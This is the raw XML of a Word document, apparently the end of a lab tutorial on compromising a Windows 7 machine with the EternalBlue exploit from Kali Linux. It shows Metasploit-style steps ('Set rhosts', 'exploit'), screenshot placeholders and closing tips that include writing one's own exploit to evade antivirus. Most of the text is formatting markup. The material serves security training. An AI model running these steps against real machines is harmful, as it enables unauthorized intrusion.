    <w:p w14:paraId="213C6BE6" w14:textId="77777777" w:rsidR="006C3F3E" w:rsidRPr="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="006C3F3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3F3E">
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C3F3E">
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3F3E">
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C3F3E">
        <w:t>window IP address &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D61A1" w14:textId="75ED7208" w:rsidR="006C3F3E" w:rsidRPr="00197E78" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:r w:rsidRPr="006C3F3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DDC1D72" wp14:editId="006296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02920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="186768597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F1F7F1D-A2B5-01D7-02BA-95B5DE07AA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F1F7F1D-A2B5-01D7-02BA-95B5DE07AA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CE2BD" w14:textId="419B0845" w:rsidR="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB5AB09" w14:textId="77777777" w:rsidR="00F3315B" w:rsidRPr="00DE2CF3" w:rsidRDefault="00F3315B" w:rsidP="00F3315B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot above </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>command  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122D73E" w14:textId="5E021D91" w:rsidR="003E7C62" w:rsidRDefault="006D614B" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D614B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563CFCFF" wp14:editId="64EA6A4F">
            <wp:extent cx="5731510" cy="3581746"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="C:\Users\Personal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-23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ersonal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-23-1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3543" w14:textId="4BCC9259" w:rsidR="006C3F3E" w:rsidRPr="003E7C62" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3F3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6140F298" wp14:editId="00D9A8C2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5731510" cy="488315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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EBF559F-0E95-5774-C73D-3059C10A17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AEBF559F-0E95-5774-C73D-3059C10A17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C62">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827C0D8" w14:textId="7880CBE4" w:rsidR="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A941EC" w14:textId="2D4AC4EC" w:rsidR="006C3F3E" w:rsidRDefault="006042F9" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28714AE8" wp14:editId="6F692B82">
            <wp:extent cx="5731510" cy="4652645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="168602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3B8E" w14:textId="0FFD529C" w:rsidR="00F3315B" w:rsidRDefault="00F3315B" w:rsidP="00F3315B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot above </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>command  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00934429">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456F275" w14:textId="2B638FE0" w:rsidR="006D614B" w:rsidRDefault="006D614B" w:rsidP="00F3315B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D614B">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA4F2B9" wp14:editId="18951C18">
            <wp:extent cx="5731510" cy="3581746"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="C:\Users\Personal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-24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ersonal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-24-3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3EF9" w14:textId="74340CDF" w:rsidR="006D614B" w:rsidRPr="00DE2CF3" w:rsidRDefault="006D614B" w:rsidP="00F3315B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BDEB8FB" wp14:editId="35A88BC5">
            <wp:extent cx="5731510" cy="35820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0AB5" w14:textId="679ACFDB" w:rsidR="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235BB757" w14:textId="5C23EC47" w:rsidR="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F125FA" w14:textId="77777777" w:rsidR="00335AEF" w:rsidRPr="00335AEF" w:rsidRDefault="00335AEF" w:rsidP="00335AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nice You hacked the Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134AC0EA" w14:textId="77777777" w:rsidR="00335AEF" w:rsidRPr="00335AEF" w:rsidRDefault="00335AEF" w:rsidP="00335AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This attack only work if windows 7 have no Antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7835C" w14:textId="77777777" w:rsidR="00335AEF" w:rsidRPr="00335AEF" w:rsidRDefault="00335AEF" w:rsidP="00335AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Antivirus can easily detect Eternal Blue exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D73CA9" w14:textId="27C31877" w:rsidR="00335AEF" w:rsidRPr="00BB07F3" w:rsidRDefault="00335AEF" w:rsidP="00335AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">To prevent from Antivirus Catch, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00335AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> your own exploit and try to hack windows 7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E53AB" w14:textId="292C70B5" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28ECA254" w14:textId="191C4171" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C07461E" w14:textId="6E19E455" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72597F65" w14:textId="6E7942E5" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D08391D" w14:textId="7F83D2FD" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4242B8" w14:textId="7FB8D9F4" w:rsidR="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>*********************************************************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E6910" w14:textId="7F617BBA" w:rsidR="00BB07F3" w:rsidRPr="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3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9D48495" w14:textId="1D7785BD" w:rsidR="00BB07F3" w:rsidRPr="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00BB07F3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1000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                                  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>C</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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>ontributor :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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>Nouman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>sajid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB07F3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sectPr w:rsidR="00BB07F3" w:rsidRPr="00BB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65B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C35C3466"/>
    <w:lvl w:ilvl="0" w:tplc="B8CCED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A22D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D290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F0CC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E4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489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94DC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CCC5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665B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66610"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CE6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D1C5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3EC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8067D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56FC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62A41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="737010F8"/>
    <w:lvl w:ilvl="0" w:tplc="573CE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0A86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0084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0ED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E4A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5A2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D2B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CC8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FCEF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7B4970"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2312C0F2"/>
    <w:lvl w:ilvl="0" w:tplc="BBEE1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AECF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D26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24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B6E1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923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2C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DA1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1646CA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CB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066D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED3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B6748"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E256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C3892"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B86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E2ECD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E460FB0"/>
    <w:lvl w:ilvl="0" w:tplc="587C17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4C3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40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7469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5A66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2C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0DF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741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F8D8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58F0E0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5B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30719"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0658E098"/>
    <w:lvl w:ilvl="0" w:tplc="BC3E2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C41A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A26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0A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64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72F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2E1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E9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7CF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B17B83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27A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457D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="776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D1A90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E28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DF6BA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78E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803B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B4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50A5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8424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185A16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BEA5948"/>
    <w:lvl w:ilvl="0" w:tplc="968E2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4E84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B6D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A63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68B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8A6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C3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E5F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944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9022C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8308F02"/>
    <w:lvl w:ilvl="0" w:tplc="AF469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7E4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1D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744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70D0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C6F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8A4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4C5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5CF2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6921F92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A222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B45E5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC2E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35BE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F568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D11F35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6D67378"/>
    <w:lvl w:ilvl="0" w:tplc="41B4E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10B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F6C4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A0E0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3E33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74AD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04B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A8E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0A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691466D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F58B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C93229"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28E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F2DA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FA8F556"/>
    <w:lvl w:ilvl="0" w:tplc="77F467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82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502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AF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2D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A67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6C9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BEC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4C4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0BF168C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E5A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2775E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4C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F23FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B50E4A52"/>
    <w:lvl w:ilvl="0" w:tplc="A64C3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AE0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E660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360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6470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F0A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67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E8C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00B4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6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="10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F7"/>
    <w:rsid w:val="000C23C6"/>
    <w:rsid w:val="000E4559"/>
    <w:rsid w:val="000E7D7C"/>
    <w:rsid w:val="00131511"/>
    <w:rsid w:val="00197E78"/>
    <w:rsid w:val="001E788C"/>
    <w:rsid w:val="002D03F8"/>
    <w:rsid w:val="00325CFE"/>
    <w:rsid w:val="00335AEF"/>
    <w:rsid w:val="003B4DF7"/>
    <w:rsid w:val="003D446B"/>
    <w:rsid w:val="003E7C62"/>
    <w:rsid w:val="003F60F1"/>
    <w:rsid w:val="0043686B"/>
    <w:rsid w:val="00463E38"/>
    <w:rsid w:val="00482A2E"/>
    <w:rsid w:val="004B3306"/>
    <w:rsid w:val="004E1BEF"/>
    <w:rsid w:val="004E6120"/>
    <w:rsid w:val="005D0479"/>
    <w:rsid w:val="005F2738"/>
    <w:rsid w:val="006042F9"/>
    <w:rsid w:val="0062201F"/>
    <w:rsid w:val="00624048"/>
    <w:rsid w:val="006867E1"/>
    <w:rsid w:val="006B66CF"/>
    <w:rsid w:val="006C3F3E"/>
    <w:rsid w:val="006D1204"/>
    <w:rsid w:val="006D614B"/>
    <w:rsid w:val="006E30C8"/>
    <w:rsid w:val="007068C3"/>
    <w:rsid w:val="00725E9C"/>
    <w:rsid w:val="00745EF9"/>
    <w:rsid w:val="0076270B"/>
    <w:rsid w:val="007C59C1"/>
    <w:rsid w:val="007D7968"/>
    <w:rsid w:val="00873FC3"/>
    <w:rsid w:val="008A020B"/>
    <w:rsid w:val="009106AB"/>
    <w:rsid w:val="00934429"/>
    <w:rsid w:val="009452E2"/>
    <w:rsid w:val="00962773"/>
    <w:rsid w:val="00967CE4"/>
    <w:rsid w:val="00991F8F"/>
    <w:rsid w:val="009A084F"/>
    <w:rsid w:val="009F15FF"/>
    <w:rsid w:val="00A34FCE"/>
    <w:rsid w:val="00A6778E"/>
    <w:rsid w:val="00A67998"/>
    <w:rsid w:val="00A853D9"/>
    <w:rsid w:val="00B547A0"/>
    <w:rsid w:val="00B76A8E"/>
    <w:rsid w:val="00BB07F3"/>
    <w:rsid w:val="00BE18D5"/>
    <w:rsid w:val="00C13893"/>
    <w:rsid w:val="00C527DC"/>
    <w:rsid w:val="00CB4E46"/>
    <w:rsid w:val="00CD07A3"/>
    <w:rsid w:val="00DD1D91"/>
    <w:rsid w:val="00DE2CF3"/>
    <w:rsid w:val="00E07F1C"/>
    <w:rsid w:val="00E10B23"/>
    <w:rsid w:val="00E5118D"/>
    <w:rsid w:val="00E92BE5"/>
    <w:rsid w:val="00EE0519"/>
    <w:rsid w:val="00EF384B"/>
    <w:rsid w:val="00F3315B"/>
    <w:rsid w:val="00F9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2772E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2AF31105-813A-4B36-9E50-FA3DFF71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F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D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4D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4D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4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7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2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6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753">
          <w:marLeft w:val="60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1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58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38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6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912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384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267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713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90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1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7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9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6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6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2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9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8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6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5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3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3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5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9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5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3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3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3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3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8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66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5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3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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles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5b561-96fc-4ae4-aa06-11f45db539a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421AA966217E4F89CBBD861CD5DA12" ma:contentTypeVersion="1" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="bcebc8ecf11ba645e461aa8ff55f954a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3e55b561-96fc-4ae4-aa06-11f45db539a4" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="919be7a3bab183906cdbff9fadf37a8c" ns2:_="">
    <xsd:import namespace="3e55b561-96fc-4ae4-aa06-11f45db539a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5b561-96fc-4ae4-aa06-11f45db539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AC80D4-B986-494D-967A-8B8ABC9CCB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41288C-656E-4D05-96B5-731959C33095}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="3e55b561-96fc-4ae4-aa06-11f45db539a4"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{881BE600-A38D-48FB-BE27-1AE6FB88C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5b561-96fc-4ae4-aa06-11f45db53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9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Abdul Qayum</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Personal</cp:lastModifiedBy>
  <cp:revision>66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-11T17:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-10T11:00:00Z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ca137db427c01abeae2c71603ef2be94d641a31ef58a7a29e668e2a9e9b597aa</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x010100E2421AA966217E4F89CBBD861CD5DA12</vt:lpwstr>
  </property>
</Properties>
</file>